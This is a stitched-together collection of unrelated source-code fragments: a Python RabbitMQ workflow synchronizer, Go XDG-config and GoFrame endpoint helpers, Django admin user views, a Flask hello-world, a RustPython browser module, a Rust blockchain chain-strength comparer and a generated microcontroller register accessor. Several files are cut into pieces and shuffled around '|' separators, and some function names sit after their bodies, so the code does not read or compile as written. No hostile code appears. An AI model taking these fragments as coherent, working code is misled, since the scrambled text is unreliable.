mq_channel.basic_ack(delivery_tag=method_frame.delivery_tag)
self._report.ok('Update: ')
self._report.info('Stage %s in state %s\n' % (stage.uid, stage.state))
found_stage = True
if not found_stage:
                                    # If there was a Stage update but the Stage was not found in any of the
                                    # Pipelines, it means the Stage was added during runtime and the AppManager
                                    # does not know about it. The current solution: add it to the workflow
                                    # object in the AppManager via the synchronizer.
self._prof.prof('Adap: adding new stage', uid=self._uid)
self._logger.info('Adding new stage %s to parent pipeline: %s' % (completed_stage.uid,
pipe.uid))
pipe.add_stages(completed_stage)
mq_channel.basic_publish(exchange='',
routing_key=reply_to,
properties=pika.BasicProperties(
correlation_id=corr_id),
body='%s-ack' % completed_stage.uid)
                                    self._prof.prof('Adap: added new stage', uid=self._uid)
self._prof.prof('publishing sync ack for obj with state %s' %
msg['object']['state'],
uid=msg['object']['uid']
)
mq_channel.basic_ack(delivery_tag=method_frame.delivery_tag)
def pipeline_update(msg, reply_to, corr_id, mq_channel):
completed_pipeline = Pipeline()
completed_pipeline.from_dict(msg['object'])
self._logger.info('Received %s with state %s' % (completed_pipeline.uid, completed_pipeline.state))
# Traverse the entire workflow to find the correct pipeline
for pipe in self._workflow:
if not pipe.completed:
                        if (completed_pipeline.uid == pipe.uid) and (completed_pipeline.state != pipe.state):
pipe.state = str(completed_pipeline.state)
self._logger.info('Found pipeline %s, state %s, completed %s' % (pipe.uid,
pipe.state,
pipe.completed)
)
# Reply with ack msg to the sender
mq_channel.basic_publish(exchange='',
routing_key=reply_to,
properties=pika.BasicProperties(
correlation_id=corr_id),
body='%s-ack' % pipe.uid)
self._prof.prof('publishing sync ack for obj with state %s' %
msg['object']['state'],
uid=msg['object']['uid']
)
mq_channel.basic_ack(delivery_tag=method_frame.delivery_tag)
                            # Set the completed flag only after the acknowledgement has been sent back;
                            # otherwise the MainThread takes the lock over the pipeline for logging and
                            # profiling first.
if completed_pipeline.completed:
pipe._completed_flag.set()
self._report.ok('Update: ')
self._report.info('Pipeline %s in state %s\n' % (pipe.uid, pipe.state))
mq_connection = pika.BlockingConnection(pika.ConnectionParameters(host=self._mq_hostname, port=self._port))
mq_channel = mq_connection.channel()
last = time.time()
while not self._terminate_sync.is_set():
#-------------------------------------------------------------------------------------------------------
# Messages between tmgr Main thread and synchronizer -- only Task objects
method_frame, props, body = mq_channel.basic_get(queue='%s-tmgr-to-sync' % self._sid)
"""
The message received is a JSON object with the following structure:
msg = {
'type': 'Pipeline'/'Stage'/'Task',
'object': json/dict
}
"""
if body:
msg = json.loads(body)
self._prof.prof('received obj with state %s for sync' %
msg['object']['state'], uid=msg['object']['uid'])
self._logger.debug('received %s with state %s for sync' %
(msg['object']['uid'], msg['object']['state']))
if msg['type'] == 'Task':
task_update(msg, '%s-sync-to-tmgr' % self._sid, props.correlation_id, mq_channel)
#-------------------------------------------------------------------------------------------------------
#-------------------------------------------------------------------------------------------------------
# Messages between callback thread and synchronizer -- only Task objects
method_frame, props, body = mq_channel.basic_get(queue='%s-cb-to-sync' % self._sid)
"""
The message received is a JSON object with the following structure:
msg = {
'type': 'Pipeline'/'Stage'/'Task',
'object': json/dict
}
"""
if body:
msg = json.loads(body)
self._prof.prof('received obj with state %s for sync' %
msg['object']['state'], uid=msg['object']['uid'])
self._logger.debug('received %s with state %s for sync' %
(msg['object']['uid'], msg['object']['state']))
if msg['type'] == 'Task':
task_update(msg, '%s-sync-to-cb' % self._sid, props.correlation_id, mq_channel)
#-------------------------------------------------------------------------------------------------------
#-------------------------------------------------------------------------------------------------------
# Messages between enqueue thread and synchronizer -- Task, Stage or Pipeline
method_frame, props, body = mq_channel.basic_get(queue='%s-enq-to-sync' % self._sid)
if body:
msg = json.loads(body)
self._prof.prof('received obj with state %s for sync' %
msg['object']['state'], uid=msg['object']['uid'])
self._logger.debug('received %s with state %s for sync' %
(msg['object']['uid'], msg['object']['state']))
if msg['type'] == 'Task':
task_update(msg, '%s-sync-to-enq' % self._sid, props.correlation_id, mq_channel)
elif msg['type'] == 'Stage':
stage_update(msg, '%s-sync-to-enq' % self._sid, props.correlation_id, mq_channel)
elif msg['type'] == 'Pipeline':
pipeline_update(msg, '%s-sync-to-enq' % self._sid, props.correlation_id, mq_channel)
#-------------------------------------------------------------------------------------------------------
#-------------------------------------------------------------------------------------------------------
# Messages between dequeue thread and synchronizer -- Task, Stage or Pipeline
method_frame, props, body = mq_channel.basic_get(queue='%s-deq-to-sync' % self._sid)
if body:
msg = json.loads(body)
self._prof.prof('received obj with state %s for sync' %
msg['object']['state'], uid=msg['object']['uid'])
self._logger.debug('received %s with state %s for sync' %
(msg['object']['uid'], msg['object']['state']))
if msg['type'] == 'Task':
task_update(msg, '%s-sync-to-deq' % self._sid, props.correlation_id, mq_channel)
elif msg['type'] == 'Stage':
stage_update(msg, '%s-sync-to-deq' % self._sid, props.correlation_id, mq_channel)
elif msg['type'] == 'Pipeline':
pipeline_update(msg, '%s-sync-to-deq' % self._sid, props.correlation_id, mq_channel)
#-------------------------------------------------------------------------------------------------------
# Appease pika cos it thinks the connection is dead
now = time.time()
if now - last >= self._rmq_ping_interval:
mq_connection.process_data_events()
last = now
self._prof.prof('terminating synchronizer', uid=self._uid)
except KeyboardInterrupt:
self._logger.error('Execution interrupted by user (you probably hit Ctrl+C), ' +
'trying to terminate synchronizer thread gracefully...')
raise KeyboardInterrupt
        except Exception as ex:
self._logger.exception('Unknown error in synchronizer: %s. \n Terminating thread' % ex)
raise
# ------------------------------------------------------------------------------------------------------------------
|
self._prof.prof('assigning workflow', uid=self._uid)
for p in workflow:
if not isinstance(p, Pipeline):
self._logger.info('workflow type incorrect')
raise TypeError(expected_type=['Pipeline', 'set of Pipelines'], actual_type=type(p))
p._validate()
self._workflow = workflow
self._logger.info('Workflow assigned to Application Manager')
|
xdg.go
|
package main
import (
"path/filepath"
)
// Loosely follows
// http://standards.freedesktop.org/basedir-spec/basedir-spec-0.8.html
// We don't handle XDG_CONFIG_DIRS yet
func XdgConfigDir(env Env, programName string) string {
if env["XDG_CONFIG_HOME"] != "" {
return filepath.Join(env["XDG_CONFIG_HOME"], programName)
} else if env["HOME"] != ""
|
// In theory we could also read /etc/passwd and look for the home matching the process' Uid
return ""
}
|
{
return filepath.Join(env["HOME"], ".config", programName)
}
|
gsvc_endpoint.go
|
// Copyright GoFrame Author(https://goframe.org). All Rights Reserved.
//
// This Source Code Form is subject to the terms of the MIT License.
// If a copy of the MIT was not distributed with this file,
// You can obtain one at https://github.com/gogf/gf.
// Package gsvc provides service registry and discovery definition.
package gsvc
import (
"fmt"
"github.com/gogf/gf/v2/errors/gcode"
"github.com/gogf/gf/v2/errors/gerror"
"github.com/gogf/gf/v2/text/gstr"
"github.com/gogf/gf/v2/util/gconv"
)
// LocalEndpoint implements interface Endpoint.
type LocalEndpoint struct {
host string // host can be either IPv4 or IPv6 address.
	port int    // port is the service port number.
}
// NewEndpoint creates and returns an Endpoint from address string of pattern "host:port",
// eg: "192.168.1.100:80".
func
|
(address string) Endpoint {
array := gstr.SplitAndTrim(address, endpointHostPortDelimiter)
if len(array) != 2 {
panic(gerror.NewCodef(
gcode.CodeInvalidParameter,
`invalid address "%s" for creating endpoint, endpoint address is like "ip:port"`,
address,
))
}
return &LocalEndpoint{
host: array[0],
port: gconv.Int(array[1]),
}
}
// Host returns the IPv4/IPv6 address of a service.
func (e *LocalEndpoint) Host() string {
return e.host
}
// Port returns the port of a service.
func (e *LocalEndpoint) Port() int {
return e.port
}
// String formats and returns the Endpoint as a string, like: 192.168.1.100:80.
func (e *LocalEndpoint) String() string {
return fmt.Sprintf(`%s:%d`, e.host, e.port)
}
|
NewEndpoint
|
user.py
|
#-*- coding: utf-8 -*-
from django.shortcuts import render, redirect, get_object_or_404
from django.contrib.auth import get_user_model
from django.contrib import messages
from django.utils.translation import ugettext as _
from spirit.utils.decorators import administrator_required
from spirit.forms.admin import UserEditForm
User = get_user_model()
@administrator_required
def user_edit(request, user_id):
user = get_object_or_404(User, pk=user_id)
if request.method == 'POST':
form = UserEditForm(data=request.POST, instance=user)
if form.is_valid():
form.save()
messages.info(request, _("This profile has been updated!"))
return redirect(request.GET.get("next", request.get_full_path()))
else:
form = UserEditForm(instance=user)
return render(request, 'spirit/admin/user/user_edit.html', {'form': form, })
@administrator_required
def user_list(request):
users = User.objects.all()
return render(request, 'spirit/admin/user/user_list.html', {'users': users, })
@administrator_required
def user_admins(request):
users = User.objects.filter(is_administrator=True)
return render(request, 'spirit/admin/user/user_admins.html', {'users': users, })
@administrator_required
def user_mods(request):
users = User.objects.filter(is_moderator=True, is_administrator=False)
return render(request, 'spirit/admin/user/user_mods.html', {'users': users, })
@administrator_required
def user_unactive(request):
|
users = User.objects.filter(is_active=False)
return render(request, 'spirit/admin/user/user_unactive.html', {'users': users, })
|
|
flask_sample_program.py
|
from flask import Flask
app = Flask(__name__)
@app.route("/")
def sample_program():
|
return "This is sample flask program"
|
|
browser_module.rs
|
use crate::{convert, js_module::PyPromise, vm_class::weak_vm, wasm_builtins::window};
use js_sys::Promise;
use rustpython_vm::{
builtins::{PyDictRef, PyStrRef},
function::{ArgCallable, IntoPyObject, OptionalArg},
|
};
use wasm_bindgen::{prelude::*, JsCast};
use wasm_bindgen_futures::JsFuture;
enum FetchResponseFormat {
Json,
Text,
ArrayBuffer,
}
impl FetchResponseFormat {
fn from_str(vm: &VirtualMachine, s: &str) -> PyResult<Self> {
match s {
"json" => Ok(FetchResponseFormat::Json),
"text" => Ok(FetchResponseFormat::Text),
"array_buffer" => Ok(FetchResponseFormat::ArrayBuffer),
_ => Err(vm.new_type_error("Unkown fetch response_format".into())),
}
}
fn get_response(&self, response: &web_sys::Response) -> Result<Promise, JsValue> {
match self {
FetchResponseFormat::Json => response.json(),
FetchResponseFormat::Text => response.text(),
FetchResponseFormat::ArrayBuffer => response.array_buffer(),
}
}
}
#[derive(FromArgs)]
struct FetchArgs {
#[pyarg(named, default)]
response_format: Option<PyStrRef>,
#[pyarg(named, default)]
method: Option<PyStrRef>,
#[pyarg(named, default)]
headers: Option<PyDictRef>,
#[pyarg(named, default)]
body: Option<PyObjectRef>,
#[pyarg(named, default)]
content_type: Option<PyStrRef>,
}
fn browser_fetch(url: PyStrRef, args: FetchArgs, vm: &VirtualMachine) -> PyResult {
let FetchArgs {
response_format,
method,
headers,
body,
content_type,
} = args;
let response_format = match response_format {
Some(s) => FetchResponseFormat::from_str(vm, s.as_str())?,
None => FetchResponseFormat::Text,
};
let mut opts = web_sys::RequestInit::new();
match method {
Some(s) => opts.method(s.as_str()),
None => opts.method("GET"),
};
if let Some(body) = body {
opts.body(Some(&convert::py_to_js(vm, body)));
}
let request = web_sys::Request::new_with_str_and_init(url.as_str(), &opts)
.map_err(|err| convert::js_py_typeerror(vm, err))?;
if let Some(headers) = headers {
let h = request.headers();
for (key, value) in headers {
let key = vm.to_str(&key)?;
let value = vm.to_str(&value)?;
h.set(key.as_str(), value.as_str())
.map_err(|err| convert::js_py_typeerror(vm, err))?;
}
}
if let Some(content_type) = content_type {
request
.headers()
.set("Content-Type", content_type.as_str())
.map_err(|err| convert::js_py_typeerror(vm, err))?;
}
let window = window();
let request_prom = window.fetch_with_request(&request);
let future = async move {
let val = JsFuture::from(request_prom).await?;
let response = val
.dyn_into::<web_sys::Response>()
.expect("val to be of type Response");
JsFuture::from(response_format.get_response(&response)?).await
};
Ok(PyPromise::from_future(future).into_object(vm))
}
fn browser_request_animation_frame(func: ArgCallable, vm: &VirtualMachine) -> PyResult {
use std::{cell::RefCell, rc::Rc};
// this basic setup for request_animation_frame taken from:
// https://rustwasm.github.io/wasm-bindgen/examples/request-animation-frame.html
let f = Rc::new(RefCell::new(None));
let g = f.clone();
let weak_vm = weak_vm(vm);
*g.borrow_mut() = Some(Closure::wrap(Box::new(move |time: f64| {
let stored_vm = weak_vm
.upgrade()
.expect("that the vm is valid from inside of request_animation_frame");
stored_vm.interp.enter(|vm| {
let func = func.clone();
let args = vec![vm.ctx.new_float(time)];
let _ = vm.invoke(&func, args);
let closure = f.borrow_mut().take();
drop(closure);
})
}) as Box<dyn Fn(f64)>));
let id = window()
.request_animation_frame(&js_sys::Function::from(
g.borrow().as_ref().unwrap().as_ref().clone(),
))
.map_err(|err| convert::js_py_typeerror(vm, err))?;
Ok(vm.ctx.new_int(id))
}
fn browser_cancel_animation_frame(id: i32, vm: &VirtualMachine) -> PyResult<()> {
window()
.cancel_animation_frame(id)
.map_err(|err| convert::js_py_typeerror(vm, err))?;
Ok(())
}
#[pyclass(module = "browser", name)]
#[derive(Debug, PyValue)]
struct Document {
doc: web_sys::Document,
}
#[pyimpl]
impl Document {
#[pymethod]
fn query(&self, query: PyStrRef, vm: &VirtualMachine) -> PyResult {
let elem = self
.doc
.query_selector(query.as_str())
.map_err(|err| convert::js_py_typeerror(vm, err))?
.map(|elem| Element { elem })
.into_pyobject(vm);
Ok(elem)
}
}
#[pyclass(module = "browser", name)]
#[derive(Debug, PyValue)]
struct Element {
elem: web_sys::Element,
}
#[pyimpl]
impl Element {
#[pymethod]
fn get_attr(
&self,
attr: PyStrRef,
default: OptionalArg<PyObjectRef>,
vm: &VirtualMachine,
) -> PyObjectRef {
match self.elem.get_attribute(attr.as_str()) {
Some(s) => vm.ctx.new_utf8_str(s),
None => default.unwrap_or_none(vm),
}
}
#[pymethod]
fn set_attr(&self, attr: PyStrRef, value: PyStrRef, vm: &VirtualMachine) -> PyResult<()> {
self.elem
.set_attribute(attr.as_str(), value.as_str())
.map_err(|err| convert::js_py_typeerror(vm, err))
}
}
fn browser_load_module(module: PyStrRef, path: PyStrRef, vm: &VirtualMachine) -> PyResult {
let weak_vm = weak_vm(vm);
let mut opts = web_sys::RequestInit::new();
opts.method("GET");
let request = web_sys::Request::new_with_str_and_init(path.as_str(), &opts)
.map_err(|err| convert::js_py_typeerror(vm, err))?;
let window = window();
let request_prom = window.fetch_with_request(&request);
let future = async move {
let val = JsFuture::from(request_prom).await?;
let response = val
.dyn_into::<web_sys::Response>()
.expect("val to be of type Response");
let text = JsFuture::from(response.text()?).await?;
let stored_vm = &weak_vm
.upgrade()
.expect("that the vm is valid when the promise resolves");
stored_vm.interp.enter(move |vm| {
let resp_text = text.as_string().unwrap();
let res = import_file(vm, module.as_str(), "WEB".to_owned(), resp_text);
match res {
Ok(_) => Ok(JsValue::null()),
Err(err) => Err(convert::py_err_to_js_err(vm, &err)),
}
})
};
Ok(PyPromise::from_future(future).into_object(vm))
}
pub fn make_module(vm: &VirtualMachine) -> PyObjectRef {
let ctx = &vm.ctx;
let document_class = Document::make_class(ctx);
let document = PyObject::new(
Document {
doc: window().document().expect("Document missing from window"),
},
document_class.clone(),
None,
);
let element = Element::make_class(ctx);
py_module!(vm, "_browser", {
"fetch" => named_function!(ctx, browser, fetch),
"request_animation_frame" => named_function!(ctx, browser, request_animation_frame),
"cancel_animation_frame" => named_function!(ctx, browser, cancel_animation_frame),
"Document" => document_class,
"document" => document,
"Element" => element,
"load_module" => named_function!(ctx, browser, load_module),
})
}
pub fn setup_browser_module(vm: &mut VirtualMachine) {
vm.add_native_module("_browser".to_owned(), Box::new(make_module));
vm.add_frozen(py_freeze!(dir = "Lib"));
}
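// Example usage from Python once the module is registered (sketch; assumes
// a RustPython-on-wasm build where `_browser` is importable):
//
//     import _browser
//     _browser.fetch("/data.json", response_format="json")
//     elem = _browser.document.query("#status")
//     elem.set_attr("class", "ready")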
|
import::import_file,
PyClassImpl, PyObject, PyObjectRef, PyResult, PyValue, VirtualMachine,
|
chain_strength_comparer.rs
|
use crate::blocks::BlockHeader;
use std::{cmp::Ordering, fmt::Debug};
pub trait ChainStrengthComparer: Debug {
fn compare(&self, a: &BlockHeader, b: &BlockHeader) -> Ordering;
}
#[derive(Default, Debug)]
pub struct AccumulatedDifficultySquaredComparer {}
impl ChainStrengthComparer for AccumulatedDifficultySquaredComparer {
fn compare(&self, a: &BlockHeader, b: &BlockHeader) -> Ordering {
let a_val = a.total_accumulated_difficulty_inclusive_squared().unwrap_or_default();
let b_val = b.total_accumulated_difficulty_inclusive_squared().unwrap_or_default();
a_val.cmp(&b_val)
}
}
#[derive(Debug)]
pub struct ThenComparer {
before: Box<dyn ChainStrengthComparer + Send + Sync>,
after: Box<dyn ChainStrengthComparer + Send + Sync>,
}
impl ThenComparer {
pub fn new(
before: Box<dyn ChainStrengthComparer + Send + Sync>,
after: Box<dyn ChainStrengthComparer + Send + Sync>,
) -> Self
{
ThenComparer { before, after }
}
}
impl ChainStrengthComparer for ThenComparer {
fn compare(&self, a: &BlockHeader, b: &BlockHeader) -> Ordering {
match self.before.compare(a, b) {
Ordering::Equal => self.after.compare(a, b),
Ordering::Less => Ordering::Less,
Ordering::Greater => Ordering::Greater,
}
}
}
#[derive(Default, Debug)]
pub struct MoneroDifficultyComparer {}
impl ChainStrengthComparer for MoneroDifficultyComparer {
fn compare(&self, a: &BlockHeader, b: &BlockHeader) -> Ordering {
a.pow
.accumulated_monero_difficulty
.cmp(&b.pow.accumulated_monero_difficulty)
}
}
#[derive(Default, Debug)]
pub struct BlakeDifficultyComparer {}
impl ChainStrengthComparer for BlakeDifficultyComparer {
fn compare(&self, a: &BlockHeader, b: &BlockHeader) -> Ordering {
a.pow
.accumulated_blake_difficulty
.cmp(&b.pow.accumulated_blake_difficulty)
}
}
#[derive(Default, Debug)]
pub struct HeightComparer {}
impl ChainStrengthComparer for HeightComparer {
fn compare(&self, a: &BlockHeader, b: &BlockHeader) -> Ordering {
a.height.cmp(&b.height)
}
}
pub struct ChainStrengthComparerBuilder {
target: Option<Box<dyn ChainStrengthComparer + Send + Sync>>,
}
impl ChainStrengthComparerBuilder {
pub fn new() -> ChainStrengthComparerBuilder {
ChainStrengthComparerBuilder { target: None }
|
self.target = match self.target {
Some(t) => Some(Box::new(ThenComparer::new(t, inner))),
None => Some(inner),
};
self
}
pub fn by_accumulated_difficulty(self) -> Self {
self.add_comparer_as_then(Box::new(AccumulatedDifficultySquaredComparer::default()))
}
pub fn by_monero_difficulty(self) -> Self {
self.add_comparer_as_then(Box::new(MoneroDifficultyComparer::default()))
}
pub fn by_blake_difficulty(self) -> Self {
self.add_comparer_as_then(Box::new(BlakeDifficultyComparer::default()))
}
pub fn by_height(self) -> Self {
self.add_comparer_as_then(Box::new(HeightComparer::default()))
}
pub fn then(self) -> Self {
// convenience method for wording
self
}
pub fn build(self) -> Box<dyn ChainStrengthComparer + Send + Sync> {
self.target.unwrap()
}
}
pub fn strongest_chain() -> ChainStrengthComparerBuilder {
ChainStrengthComparerBuilder::new()
}
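// Composition sketch (illustrative; `header_a`/`header_b` are assumed
// `BlockHeader` values, not defined here):
//
//     let comparer = strongest_chain()
//         .by_accumulated_difficulty()
//         .then()
//         .by_height()
//         .build();
//     let ordering = comparer.compare(&header_a, &header_b);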
|
}
fn add_comparer_as_then(mut self, inner: Box<dyn ChainStrengthComparer + Send + Sync>) -> Self {
|
p0_8.rs
|
#[doc = "Reader of register P0_8"]
pub type R = crate::R<u32, super::P0_8>;
#[doc = "Writer for register P0_8"]
pub type W = crate::W<u32, super::P0_8>;
#[doc = "Register P0_8 `reset()`'s with value 0xa0"]
impl crate::ResetValue for super::P0_8 {
type Type = u32;
#[inline(always)]
fn reset_value() -> Self::Type {
0xa0
}
}
#[doc = "Selects pin function for pin P0\\[8\\]\n\nValue on reset: 0"]
#[derive(Clone, Copy, Debug, PartialEq)]
#[repr(u8)]
pub enum FUNC_A {
#[doc = "0: General purpose digital input/output\r\n pin."]
P0_8 = 0,
#[doc = "1: I2S Transmit word select. It is driven by the master and received by the slave. Corresponds to the signal WS in the I2S-bus specification."]
I2S_TX_WS = 1,
#[doc = "2: Master In Slave Out for SSP1."]
SSP1_MISO = 2,
#[doc = "3: Match output for Timer 2, channel 2."]
T2_MAT2 = 3,
#[doc = "4: Event input 1 to Event Monitor/Recorder."]
RTC_EV1 = 4,
#[doc = "7: LCD data."]
LCD_VD_16 = 7,
}
impl From<FUNC_A> for u8 {
#[inline(always)]
fn from(variant: FUNC_A) -> Self {
variant as _
}
}
#[doc = "Reader of field `FUNC`"]
pub type FUNC_R = crate::R<u8, FUNC_A>;
impl FUNC_R {
#[doc = r"Get enumerated values variant"]
#[inline(always)]
pub fn variant(&self) -> crate::Variant<u8, FUNC_A> {
use crate::Variant::*;
match self.bits {
0 => Val(FUNC_A::P0_8),
1 => Val(FUNC_A::I2S_TX_WS),
2 => Val(FUNC_A::SSP1_MISO),
3 => Val(FUNC_A::T2_MAT2),
4 => Val(FUNC_A::RTC_EV1),
7 => Val(FUNC_A::LCD_VD_16),
i => Res(i),
}
}
#[doc = "Checks if the value of the field is `P0_8`"]
#[inline(always)]
pub fn is_p0_8(&self) -> bool {
*self == FUNC_A::P0_8
}
#[doc = "Checks if the value of the field is `I2S_TX_WS`"]
#[inline(always)]
pub fn is_i2s_tx_ws(&self) -> bool {
*self == FUNC_A::I2S_TX_WS
}
#[doc = "Checks if the value of the field is `SSP1_MISO`"]
#[inline(always)]
pub fn is_ssp1_miso(&self) -> bool {
*self == FUNC_A::SSP1_MISO
}
#[doc = "Checks if the value of the field is `T2_MAT2`"]
#[inline(always)]
pub fn is_t2_mat2(&self) -> bool {
*self == FUNC_A::T2_MAT2
}
#[doc = "Checks if the value of the field is `RTC_EV1`"]
#[inline(always)]
pub fn is_rtc_ev1(&self) -> bool {
*self == FUNC_A::RTC_EV1
}
#[doc = "Checks if the value of the field is `LCD_VD_16`"]
#[inline(always)]
pub fn is_lcd_vd_16(&self) -> bool {
*self == FUNC_A::LCD_VD_16
}
}
#[doc = "Write proxy for field `FUNC`"]
pub struct FUNC_W<'a> {
w: &'a mut W,
}
impl<'a> FUNC_W<'a> {
#[doc = r"Writes `variant` to the field"]
#[inline(always)]
pub fn variant(self, variant: FUNC_A) -> &'a mut W {
unsafe { self.bits(variant.into()) }
}
#[doc = "General purpose digital input/output pin."]
#[inline(always)]
pub fn p0_8(self) -> &'a mut W {
self.variant(FUNC_A::P0_8)
}
#[doc = "I2S Transmit word select. It is driven by the master and received by the slave. Corresponds to the signal WS in the I2S-bus specification."]
#[inline(always)]
pub fn i2s_tx_ws(self) -> &'a mut W {
self.variant(FUNC_A::I2S_TX_WS)
}
#[doc = "Master In Slave Out for SSP1."]
#[inline(always)]
pub fn ssp1_miso(self) -> &'a mut W {
self.variant(FUNC_A::SSP1_MISO)
}
#[doc = "Match output for Timer 2, channel 2."]
#[inline(always)]
pub fn t2_mat2(self) -> &'a mut W {
self.variant(FUNC_A::T2_MAT2)
}
#[doc = "Event input 1 to Event Monitor/Recorder."]
#[inline(always)]
pub fn rtc_ev1(self) -> &'a mut W {
self.variant(FUNC_A::RTC_EV1)
}
#[doc = "LCD data."]
#[inline(always)]
pub fn lcd_vd_16(self) -> &'a mut W {
self.variant(FUNC_A::LCD_VD_16)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub unsafe fn bits(self, value: u8) -> &'a mut W {
self.w.bits = (self.w.bits & !0x07) | ((value as u32) & 0x07);
self.w
}
}
#[doc = "Selects function mode (on-chip pull-up/pull-down resistor control).\n\nValue on reset: 0"]
#[derive(Clone, Copy, Debug, PartialEq)]
#[repr(u8)]
pub enum MODE_A {
#[doc = "0: Inactive (no pull-down/pull-up resistor\r\n enabled)."]
INACTIVE_NO_PULL_DO = 0,
#[doc = "1: Pull-down resistor enabled."]
PULL_DOWN_RESISTOR_E = 1,
#[doc = "2: Pull-up resistor enabled."]
PULL_UP_RESISTOR_ENA = 2,
#[doc = "3: Repeater mode."]
REPEATER_MODE_ = 3,
}
impl From<MODE_A> for u8 {
#[inline(always)]
fn from(variant: MODE_A) -> Self {
variant as _
}
}
#[doc = "Reader of field `MODE`"]
pub type MODE_R = crate::R<u8, MODE_A>;
impl MODE_R {
#[doc = r"Get enumerated values variant"]
#[inline(always)]
pub fn variant(&self) -> MODE_A {
match self.bits {
0 => MODE_A::INACTIVE_NO_PULL_DO,
1 => MODE_A::PULL_DOWN_RESISTOR_E,
2 => MODE_A::PULL_UP_RESISTOR_ENA,
3 => MODE_A::REPEATER_MODE_,
_ => unreachable!(),
}
}
#[doc = "Checks if the value of the field is `INACTIVE_NO_PULL_DO`"]
#[inline(always)]
pub fn is_inactive_no_pull_do(&self) -> bool {
*self == MODE_A::INACTIVE_NO_PULL_DO
}
#[doc = "Checks if the value of the field is `PULL_DOWN_RESISTOR_E`"]
#[inline(always)]
pub fn is_pull_down_resistor_e(&self) -> bool {
*self == MODE_A::PULL_DOWN_RESISTOR_E
}
#[doc = "Checks if the value of the field is `PULL_UP_RESISTOR_ENA`"]
#[inline(always)]
pub fn is_pull_up_resistor_ena(&self) -> bool {
*self == MODE_A::PULL_UP_RESISTOR_ENA
}
#[doc = "Checks if the value of the field is `REPEATER_MODE_`"]
#[inline(always)]
pub fn is_repeater_mode_(&self) -> bool {
*self == MODE_A::REPEATER_MODE_
}
}
#[doc = "Write proxy for field `MODE`"]
pub struct MODE_W<'a> {
w: &'a mut W,
}
impl<'a> MODE_W<'a> {
#[doc = r"Writes `variant` to the field"]
#[inline(always)]
pub fn variant(self, variant: MODE_A) -> &'a mut W {
{
self.bits(variant.into())
}
}
#[doc = "Inactive (no pull-down/pull-up resistor enabled)."]
#[inline(always)]
pub fn inactive_no_pull_do(self) -> &'a mut W {
self.variant(MODE_A::INACTIVE_NO_PULL_DO)
}
#[doc = "Pull-down resistor enabled."]
#[inline(always)]
pub fn pull_down_resistor_e(self) -> &'a mut W {
self.variant(MODE_A::PULL_DOWN_RESISTOR_E)
}
#[doc = "Pull-up resistor enabled."]
#[inline(always)]
pub fn pull_up_resistor_ena(self) -> &'a mut W {
self.variant(MODE_A::PULL_UP_RESISTOR_ENA)
}
#[doc = "Repeater mode."]
#[inline(always)]
pub fn repeater_mode_(self) -> &'a mut W {
self.variant(MODE_A::REPEATER_MODE_)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bits(self, value: u8) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x03 << 3)) | (((value as u32) & 0x03) << 3);
self.w
}
}
#[doc = "Hysteresis.\n\nValue on reset: 1"]
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum HYS_A {
#[doc = "0: Disable."]
DISABLE_ = 0,
#[doc = "1: Enable."]
ENABLE_ = 1,
}
impl From<HYS_A> for bool {
#[inline(always)]
fn from(variant: HYS_A) -> Self {
variant as u8 != 0
}
}
#[doc = "Reader of field `HYS`"]
pub type HYS_R = crate::R<bool, HYS_A>;
impl HYS_R {
#[doc = r"Get enumerated values variant"]
#[inline(always)]
pub fn variant(&self) -> HYS_A {
match self.bits {
false => HYS_A::DISABLE_,
true => HYS_A::ENABLE_,
}
}
#[doc = "Checks if the value of the field is `DISABLE_`"]
#[inline(always)]
pub fn is_disable_(&self) -> bool {
*self == HYS_A::DISABLE_
}
#[doc = "Checks if the value of the field is `ENABLE_`"]
#[inline(always)]
pub fn is_enable_(&self) -> bool {
*self == HYS_A::ENABLE_
}
}
#[doc = "Write proxy for field `HYS`"]
pub struct HYS_W<'a> {
w: &'a mut W,
}
impl<'a> HYS_W<'a> {
#[doc = r"Writes `variant` to the field"]
#[inline(always)]
pub fn variant(self, variant: HYS_A) -> &'a mut W {
{
self.bit(variant.into())
}
}
#[doc = "Disable."]
#[inline(always)]
pub fn disable_(self) -> &'a mut W {
self.variant(HYS_A::DISABLE_)
}
#[doc = "Enable."]
#[inline(always)]
pub fn enable_(self) -> &'a mut W {
self.variant(HYS_A::ENABLE_)
}
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r"Clears the field bit"]
#[inline(always)]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x01 << 5)) | (((value as u32) & 0x01) << 5);
self.w
}
}
#[doc = "Invert input\n\nValue on reset: 0"]
#[derive(Clone, Copy, Debug, PartialEq)]
pub enum INV_A {
#[doc = "0: Input not inverted (HIGH on pin reads as 1, LOW on pin\r\n reads as 0)."]
INPUT_NOT_INVERTED_ = 0,
#[doc = "1: Input inverted (HIGH on pin reads as 0, LOW on pin reads as\r\n 1)."]
INPUT_INVERTED_HIGH = 1,
}
impl From<INV_A> for bool {
#[inline(always)]
fn from(variant: INV_A) -> Self {
variant as u8 != 0
}
}
#[doc = "Reader of field `INV`"]
pub type INV_R = crate::R<bool, INV_A>;
impl INV_R {
#[doc = r"Get enumerated values variant"]
#[inline(always)]
pub fn variant(&self) -> INV_A {
match self.bits {
false => INV_A::INPUT_NOT_INVERTED_,
true => INV_A::INPUT_INVERTED_HIGH,
}
}
#[doc = "Checks if the value of the field is `INPUT_NOT_INVERTED_`"]
#[inline(always)]
pub fn is_input_not_inverted_(&self) -> bool {
*self == INV_A::INPUT_NOT_INVERTED_
}
#[doc = "Checks if the value of the field is `INPUT_INVERTED_HIGH`"]
#[inline(always)]
pub fn is_input_inverted_high(&self) -> bool {
*self == INV_A::INPUT_INVERTED_HIGH
}
}
#[doc = "Write proxy for field `INV`"]
pub struct INV_W<'a> {
w: &'a mut W,
}
impl<'a> INV_W<'a> {
#[doc = r"Writes `variant` to the field"]
#[inline(always)]
pub fn variant(self, variant: INV_A) -> &'a mut W {
{
self.bit(variant.into())
}
}
#[doc = "Input not inverted (HIGH on pin reads as 1, LOW on pin reads as 0)."]
#[inline(always)]
pub fn input_not_inverted_(self) -> &'a mut W {
self.variant(INV_A::INPUT_NOT_INVERTED_)
}
#[doc = "Input inverted (HIGH on pin reads as 0, LOW on pin reads as 1)."]
